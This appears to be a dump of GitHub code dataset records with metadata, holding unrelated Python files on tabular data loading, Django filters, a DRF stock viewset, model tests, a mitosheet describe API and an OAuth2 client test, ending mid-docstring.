"lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 19, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 20, "usage_type": "name"}, {"api_name": "torchseq.utils.tokenizer.Tokenizer", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 23, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoder", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torchseq.models.transformer", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 27, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 28, "usage_type": "name"}, {"api_name": "torchseq.utils.tokenizer.Tokenizer", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torchseq.utils.functions.init_bert_params", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "transformers.MBartModel.from_pretrained", "line_number": 81, "usage_type": "call"}, {"api_name": "transformers.MBartModel", "line_number": 81, "usage_type": "name"}, {"api_name": "transformers.BartModel.from_pretrained", "line_number": 85, "usage_type": "call"}, {"api_name": "transformers.BartModel", "line_number": 85, "usage_type": "name"}, {"api_name": "transformers.RobertaModel.from_pretrained", "line_number": 89, "usage_type": "call"}, {"api_name": "transformers.RobertaModel", "line_number": 89, "usage_type": "name"}, {"api_name": "transformers.BertModel.from_pretrained", "line_number": 92, "usage_type": "call"}, {"api_name": "transformers.BertModel", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoderLayer", "line_number": 113, "usage_type": "call"}, {"api_name": "torchseq.models.transformer", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoder", "line_number": 122, "usage_type": "call"}, {"api_name": "torchseq.models.transformer", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torchseq.utils.functions.init_bert_params", "line_number": 140, "usage_type": "call"}, {"api_name": "torchseq.models.positional_embeddings.PositionalEncoding", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 147, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 148, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.tril", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.inf", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 171, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 206, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 235, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 151, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "30344271576", "text": "import glob\nimport os\nimport numpy as np\nimport csv\nimport yaml\nimport torch\nfrom data import TabularBankDataset\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass AverageMeter:\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass SaveBestModel:\n def __init__(self, save_dir, metric_name, best_metric_val=float('inf'), maximize=True):\n self.best_metric_val = best_metric_val\n self.metric_name = metric_name\n self.save_dir = save_dir\n self.maximize = maximize\n\n def __call__(self, current_val, epoch, model, optimizer, criterion=None):\n if self.maximize:\n if current_val > self.best_metric_val:\n self.best_metric_val = current_val\n print(f\"Best {self.metric_name}: {self.best_metric_val}\")\n print(\n f\"Saving best model for epoch: {epoch + 1} at {self.save_dir}\\n\")\n torch.save({\n \"epoch\": epoch+1,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": criterion,\n }, \"{}/best_model.pth\".format(self.save_dir))\n else:\n if current_val < self.best_metric_val:\n self.best_metric_val = current_val\n print(f\"Best {self.metric_name}: {self.best_metric_val}\")\n print(\n f\"Saving best model for epoch: {epoch + 1} at {self.save_dir}\\n\")\n torch.save({\n \"epoch\": epoch+1,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": criterion,\n }, \"{}/best_model.pth\".format(self.save_dir))\n\n\ndef get_config_from_args(arg):\n if arg == \"dummy\":\n return \"configs/dummy.yml\"\n else:\n exit(\"Requested configuration does not exist\")\n\n\ndef load_config(path, template=None):\n with open(path, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n\n\ndef load_csv_to_pandas(datapath=\"./bank-additional-full.csv\", drop_na=True):\n if drop_na:\n df = pd.read_csv(datapath, header=0, sep=';').dropna()\n else:\n df = pd.read_csv(datapath, header=0, sep=';', na_values=\"unknown\")\n return df\n\n\ndef create_dataloaders(path=\"./bank_additional_full.csv\", drop_na=False):\n data = load_csv_to_pandas(drop_na=False)\n if drop_na:\n data = data.dropna()\n train_data, val_data, test_data = split_dataset(data)\n test_data.to_csv(\n \"./saved_models/data2vec_imputation/test_data.csv\", index=False)\n train_data.to_csv(\n \"./saved_models/data2vec_imputation/train_data.csv\", index=False)\n train_set = TabularBankDataset(data=train_data)\n val_set = TabularBankDataset(data=val_data)\n test_set = TabularBankDataset(data=test_data)\n emb_dims_train = train_set.get_emb_dims()\n emb_dims_val = val_set.get_emb_dims()\n emb_dims_test = test_set.get_emb_dims()\n batch_size = 512\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n val_loader = torch.utils.data.DataLoader(\n val_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n test_loader = torch.utils.data.DataLoader(\n test_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return (train_loader, val_loader, test_loader), (emb_dims_train, emb_dims_val, emb_dims_test)\n\n\ndef create_balanced_loaders(path=\"./bank_additional_full.csv\", drop_na=True):\n data = load_csv_to_pandas(drop_na=False)\n yes_data = data[data[\"y\"] == \"yes\"]\n no_data = data[data[\"y\"] == \"no\"]\n N_yes = yes_data.shape[0]\n no_data = no_data.sample(n=N_yes)\n data = pd.concat([yes_data, no_data])\n if drop_na == True:\n data = data.dropna()\n data = data.sample(frac=1)\n train_data, val_data, test_data = split_dataset(data)\n test_data.to_csv(\n \"./saved_models/data2vec_balanced_classification/test_data.csv\", index=False)\n train_data.to_csv(\n \"./saved_models/data2vec_balanced_classification/train_data.csv\", index=False)\n train_set = TabularBankDataset(data=train_data)\n val_set = TabularBankDataset(data=val_data)\n test_set = TabularBankDataset(data=test_data)\n emb_dims_train = train_set.get_emb_dims()\n emb_dims_val = val_set.get_emb_dims()\n emb_dims_test = test_set.get_emb_dims()\n batch_size = 512\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n val_loader = torch.utils.data.DataLoader(\n val_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n test_loader = torch.utils.data.DataLoader(\n test_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return (train_loader, val_loader, test_loader), (emb_dims_train, emb_dims_val, emb_dims_test)\n\n\ndef load_missing(datapath=\"./bank-additional-full.csv\"):\n df = pd.read_csv(datapath, sep=';',\n na_values='unknown')\n df = df[df.isna().any(axis=1)]\n\n train_set = TabularBankDataset(data=df)\n\n emb_dims_train = train_set.get_emb_dims()\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n\n return train_loader, emb_dims\n\n\ndef omniloader(path=\"./bank_additional_full.csv\"):\n data = load_csv_to_pandas()\n dataset = TabularBankDataset(data=data)\n emb_dims = dataset.get_emb_dims()\n batch_size = 512\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return dataloader, emb_dims\n\n\ndef test_set_loader(path=\"./saved_models/data2vec_balanced_classification/test_data.csv\"):\n data = pd.read_csv(path)\n dataset = TabularBankDataset(data=data)\n emb_dims = dataset.get_emb_dims()\n batch_size = 512\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return loader, emb_dims\n\n\ndef split_dataset(dataset):\n N_train = dataset.shape[0]\n N_test = int(N_train * 0.20)\n N_val = int(N_train * 0.30)\n\n # sample the test set\n test_set = dataset.sample(n=N_test)\n # remove test set from train set\n train_set = pd.concat([dataset, test_set]).drop_duplicates(keep=False)\n # sampe validation set\n val_set = train_set.sample(n=N_val)\n train_set = pd.concat([train_set, val_set]).drop_duplicates(keep=False)\n return train_set, val_set, test_set\n", "repo_name": "fredbeaupre/STT7335-Project", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.save", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 57, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 74, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 82, "usage_type": "call"}, {"api_name": "data.dropna", "line_number": 89, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 95, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 96, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 117, "usage_type": "call"}, {"api_name": "data.dropna", "line_number": 119, "usage_type": "call"}, {"api_name": "data.sample", "line_number": 120, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 126, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 127, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 143, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 150, "usage_type": "attribute"}, {"api_name": "data.TabularBankDataset", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 167, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 184, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "11100724429", "text": "#!/bin/env python3\n\n\"\"\"Read JSON taken from the stack analysis DB and re-creates pom.xml from the data.\"\"\"\n\nimport sys\nimport json\n\n\ndef print_header():\n \"\"\"Print the header for the pom.xml manifest file.\"\"\"\n print(\"\"\"\n\n 4.0.0\n com.redhat.bayessian.test\n test-app-junit-dependency\n 1.0\n \"\"\")\n\n\ndef print_footer():\n \"\"\"Print the footer for the pom.xml manifest file.\"\"\"\n print(\"\"\"\n \n\"\"\")\n\n\ndef print_dependency(version, groupId, artifactId):\n \"\"\"Add one dependency into the pom.xml manifest file.\"\"\"\n print(\"\"\"\n \n {groupId}\n {artifactId}\n {version}\n \"\"\".format(groupId=groupId, artifactId=artifactId,\n version=version))\n\n\ndef json2pom(input):\n \"\"\"Transform the given JSON input file into the project file.\"\"\"\n print_header()\n\n dependencies = json.load(input)\n\n # transform all dependencies found in the source JSON file\n for dependency in dependencies:\n version = dependency[\"version\"]\n name = dependency[\"name\"]\n assert version\n assert name\n (groupId, artifactId) = name.split(\":\")\n print_dependency(version, groupId, artifactId)\n\n print_footer()\n\n\njson2pom(sys.stdin)\n", "repo_name": "fabric8-analytics/fabric8-analytics-common", "sub_path": "integration-tests/hack/json2pom.py", "file_name": "json2pom.py", "file_ext": "py", "file_size_in_byte": 1429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "41", "api": [{"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 56, "usage_type": "attribute"}]} +{"seq_id": "8815706707", "text": "import django.forms\nfrom django_filters import FilterSet, DateFilter\nfrom .models import *\n\n\nclass PostFilter(FilterSet):\n publishing_date = DateFilter(\n lookup_expr='gt', widget=django.forms.DateInput(attrs={'type': 'date'}\n )\n )\n\n class Meta:\n model = Post\n fields = {\n 'content': ['icontains'],\n 'title': ['icontains'],\n 'type': ['exact'],\n }\n", "repo_name": "keesulken/django_game_forum", "sub_path": "module13/news_paper/news/filters.py", "file_name": "filters.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "django_filters.FilterSet", "line_number": 6, "usage_type": "name"}, {"api_name": "django_filters.DateFilter", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms.forms.DateInput", "line_number": 8, "usage_type": "call"}, {"api_name": "django.forms.forms", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "7114631324", "text": "from rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.viewsets import ModelViewSet\nfrom products.models import Products\nfrom .serializers import ProductsSerializer\nimport logging\n\n\nclass ProductsViewSet(ModelViewSet):\n \"\"\"\n A simple ViewSet for viewing and editing accounts.\n \"\"\"\n queryset = Products.objects.all()\n serializer_class = ProductsSerializer\n\n def get_serializer(self, *args, **kwargs):\n kwargs['partial'] = True\n return super(ProductsViewSet, self).get_serializer(*args, **kwargs)\n\n def partial_update(self, request, *args, **kwargs):\n kwargs['partial'] = True\n logger = logging.getLogger(__name__)\n logger.error(request.data)\n return self.update(request, *args, **kwargs)\n\n @action(methods=[\"patch\"], detail=True)\n def decrement(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n logger = logging.getLogger(__name__)\n logger.error(request.data)\n if product.stock_quantity > 0:\n product.stock_quantity -= 1\n request.data.update({'stock_quantity': product.stock_quantity})\n return self.update(request, *args, **kwargs)\n return Response({'message': 'Não há mais estoque desse produto!'}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True)\n def increment(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n request._full_data = {'stock_quantity': (product.stock_quantity + int(request.data.get('stock_quantity')))}\n if (product.stock_quantity + 1) < int(request.data.get('stock_quantity')):\n product.stock_quantity += 1\n request.data.update({'stock_quantity': product.stock_quantity})\n return self.update(request, *args, **kwargs)\n return Response({'message': 'Estoque máximo atingido'}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True)\n def update_stock(self, request, pk=None, *args, **kwargs):\n kwargs['partial'] = True\n product = Products.objects.get(pk=pk)\n logger = logging.getLogger(__name__)\n logger.error(product.stock_quantity)\n request._full_data = {'stock_quantity': (product.stock_quantity + int(request.data.get('stock_quantity')))}\n logger.error(request._full_data)\n return self.update(request, *args, **kwargs)\n", "repo_name": "samanthacorrea/shopping-cart", "sub_path": "backend/products/api/viewsets.py", "file_name": "viewsets.py", "file_ext": "py", "file_size_in_byte": 2554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 10, "usage_type": "name"}, {"api_name": "products.models.Products.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 14, "usage_type": "name"}, {"api_name": "serializers.ProductsSerializer", "line_number": 15, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 23, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 37, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 37, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 27, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 39, "usage_type": "call"}, {"api_name": "products.models.Products.objects.get", "line_number": 53, "usage_type": "call"}, {"api_name": "products.models.Products.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "products.models.Products", "line_number": 53, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 54, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "71696697725", "text": "from aplf.t3tsc.models import Res34Unet\nfrom torch import randn, empty\nimport torch.nn as nn\n\ndef test_res34unet() -> None:\n model = Res34Unet()\n batch_size = 1\n h = 256\n w = 256\n input_hv = randn(batch_size, 2, h, w)\n out = model(input_hv)\n assert out.shape == (batch_size, 2, h, w)\n\n\n\ndef test_loss() -> None:\n loss_fn = nn.CrossEntropyLoss()\n batch_size = 1\n num_channels = 5\n h = 300\n w = 300\n x = randn(batch_size, num_channels, h, w)\n y = empty(batch_size, h, w).random_(num_channels).long()\n loss = loss_fn(x, y)\n", "repo_name": "h4nyu/aplf", "sub_path": "app/tests/t3tsc/test_model.py", "file_name": "test_model.py", "file_ext": "py", "file_size_in_byte": 565, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "aplf.t3tsc.models.Res34Unet", "line_number": 6, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "4403904954", "text": "import json\nfrom typing import Any, Dict\n\nimport pandas as pd\nfrom mitosheet.is_type_utils import is_number_dtype\nfrom mitosheet.types import StepsManagerType\n\n\ndef get_column_describe(params: Dict[str, Any], steps_manager: StepsManagerType) -> Dict[str, Any]:\n \"\"\"\n Sends back a string that can be parsed to a JSON object that\n contains _all_ the results from the series .describe function\n for the series at column_header in the df at sheet_index.\n \"\"\"\n sheet_index = params['sheet_index']\n column_id = params['column_id']\n column_header = steps_manager.curr_step.get_column_header_by_id(sheet_index, column_id)\n \n series: pd.Series = steps_manager.dfs[sheet_index][column_header]\n column_dtype = str(series.dtype)\n describe = series.describe()\n\n describe_obj = {}\n\n for index, row in describe.items():\n # We turn all the items to strings, as some items are not valid JSON\n # e.g. some wacky numpy datatypes. This allows us to send all of this \n # to the front-end.\n\n # If the series is a number, round the statistics so they look good.\n if is_number_dtype(column_dtype):\n row = round(row, 2)\n\n describe_obj[index] = str(row)\n\n # We fill in some specific values that dont get filled by default\n describe_obj['count: NaN'] = str(series.isna().sum())\n\n # NOTE: be careful adding things here, as we dont want to destroy performance \n if is_number_dtype(column_dtype):\n describe_obj['median'] = str(round(series.median(), 2))\n describe_obj['sum'] = str(round(series.sum(), 2))\n\n return describe_obj\n", "repo_name": "mito-ds/monorepo", "sub_path": "mitosheet/mitosheet/api/get_column_describe.py", "file_name": "get_column_describe.py", "file_ext": "py", "file_size_in_byte": 1621, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1800, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Dict", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "mitosheet.types.StepsManagerType", "line_number": 9, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mitosheet.is_type_utils.is_number_dtype", "line_number": 31, "usage_type": "call"}, {"api_name": "mitosheet.is_type_utils.is_number_dtype", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "42655812558", "text": "from __future__ import unicode_literals\n\nimport unittest, dataent, requests, time\nfrom dataent.test_runner import make_test_records\nfrom dataent.utils.selenium_testdriver import TestDriver\nfrom six.moves.urllib.parse import urlparse\nfrom dataent.dataentclient import DataentOAuth2Client\n\nclass TestDataentOAuth2Client(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.driver = TestDriver()\n\t\tmake_test_records(\"OAuth Client\")\n\t\tmake_test_records(\"User\")\n\t\tself.client_id = dataent.get_all(\"OAuth Client\", fields=[\"*\"])[0].get(\"client_id\")\n\n\t\t# Set Dataent server URL reqired for id_token generation\n\t\ttry:\n\t\t\tdataent_login_key = dataent.get_doc(\"Social Login Key\", \"dataent\")\n\t\texcept dataent.DoesNotExistError:\n\t\t\tdataent_login_key = dataent.new_doc(\"Social Login Key\")\n\t\tdataent_login_key.get_social_login_provider(\"Dataent\", initialize=True)\n\t\tdataent_login_key.base_url = \"http://localhost:8000\"\n\t\tdataent_login_key.save()\n\n\tdef test_insert_note(self):\n\n\t\t# Go to Authorize url\n\t\tself.driver.get(\n\t\t\t\"api/method/dataent.integrations.oauth2.authorize?client_id=\" +\n\t\t\tself.client_id +\n\t\t\t\"&scope=all%20openid&response_type=code&redirect_uri=http%3A%2F%2Flocalhost\"\n\t\t)\n\n\t\ttime.sleep(2)\n\n\t\t# Login\n\t\tusername = self.driver.find(\"#login_email\")[0]\n\t\tusername.send_keys(\"test@example.com\")\n\n\t\tpassword = self.driver.find(\"#login_password\")[0]\n\t\tpassword.send_keys(\"Eastern_43A1W\")\n\n\t\tsign_in = self.driver.find(\".btn-login\")[0]\n\t\tsign_in.submit()\n\n\t\ttime.sleep(2)\n\n\t\t# Allow access to resource\n\t\tallow = self.driver.find(\"#allow\")[0]\n\t\tallow.click()\n\n\t\ttime.sleep(2)\n\n\t\t# Get authorization code from redirected URL\n\t\tauth_code = urlparse(self.driver.driver.current_url).query.split(\"=\")[1]\n\n\t\tpayload = \"grant_type=authorization_code&code=\"\n\t\tpayload += auth_code\n\t\tpayload += \"&redirect_uri=http%3A%2F%2Flocalhost&client_id=\"\n\t\tpayload += self.client_id\n\n\t\theaders = {'content-type':'application/x-www-form-urlencoded'}\n\n\t\t# Request for bearer token\n\t\ttoken_response = requests.post( dataent.get_site_config().host_name +\n\t\t\t\"/api/method/dataent.integrations.oauth2.get_token\", data=payload, headers=headers)\n\n\t\t# Parse bearer token json\n\t\tbearer_token = token_response.json()\n\t\tclient = DataentOAuth2Client(dataent.get_site_config().host_name, bearer_token.get(\"access_token\"))\n\n\t\tnotes = [\n\t\t\t{\"doctype\": \"Note\", \"title\": \"Sing\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"a\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"Song\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"of\", \"public\": True},\n\t\t\t{\"doctype\": \"Note\", \"title\": \"sixpence\", \"public\": True}\n\t\t]\n\n\t\tfor note in notes:\n\t\t\tclient.insert(note)\n\n\t\tself.assertTrue(len(dataent.get_all(\"Note\")) == 5)\n", "repo_name": "dataent/dataent", "sub_path": "dataent/tests/test_dataentoauth2client.py", "file_name": "test_dataentoauth2client.py", "file_ext": "py", "file_size_in_byte": 2674, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "attribute"}, {"api_name": "dataent.utils.selenium_testdriver.TestDriver", "line_number": 11, "usage_type": "call"}, {"api_name": "dataent.test_runner.make_test_records", "line_number": 12, "usage_type": "call"}, {"api_name": "dataent.test_runner.make_test_records", "line_number": 13, "usage_type": "call"}, {"api_name": "dataent.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "dataent.get_doc", "line_number": 18, "usage_type": "call"}, {"api_name": "dataent.DoesNotExistError", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dataent.new_doc", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "six.moves.urllib.parse.urlparse", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 65, "usage_type": "call"}, {"api_name": "dataent.get_site_config", "line_number": 65, "usage_type": "call"}, {"api_name": "dataent.dataentclient.DataentOAuth2Client", "line_number": 70, "usage_type": "call"}, {"api_name": "dataent.get_site_config", "line_number": 70, "usage_type": "call"}, {"api_name": "dataent.get_all", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "73878749882", "text": "'''\n处理csv格式的数据\n+ 获取run信息\n+ 获取pmt对应通道信息\npython3 CSVDatabase.py --origincsv runinfo/697.csv --runcsv runinfo/RUNINFO.csv --testcsv 